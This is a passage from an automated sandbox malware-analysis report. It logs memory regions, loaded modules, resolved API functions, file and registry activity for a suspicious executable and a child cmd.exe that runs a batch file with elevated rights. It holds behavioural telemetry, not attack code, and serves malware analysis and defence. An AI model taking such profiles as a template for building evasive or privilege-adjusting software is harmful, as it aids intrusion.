| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:27 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #200: cmd.exe
160
0
| Information | Value |
|---|---|
| ID | #200 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:18, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:23 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x128 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D70
0x
5FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000900000 | 0x00900000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x0090ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00913fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x00921fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x00923fff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000004980000 | 0x04980000 | 0x04993fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ae0000 | 0x04ae0000 | 0x04ae3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004af0000 | 0x04af0000 | 0x04af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b01fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b10000 | 0x04bcdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ed0000 | 0x05206fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eea0000 | 0x7eea0000 | 0x7ef9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007efa0000 | 0x7efa0000 | 0x7efc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efc8000 | 0x7efc8000 | 0x7efcafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efcb000 | 0x7efcb000 | 0x7efcdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efce000 | 0x7efce000 | 0x7efcefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efcf000 | 0x7efcf000 | 0x7efcffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (95)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
12 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
43 | |
| Open | STD_INPUT_HANDLE | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
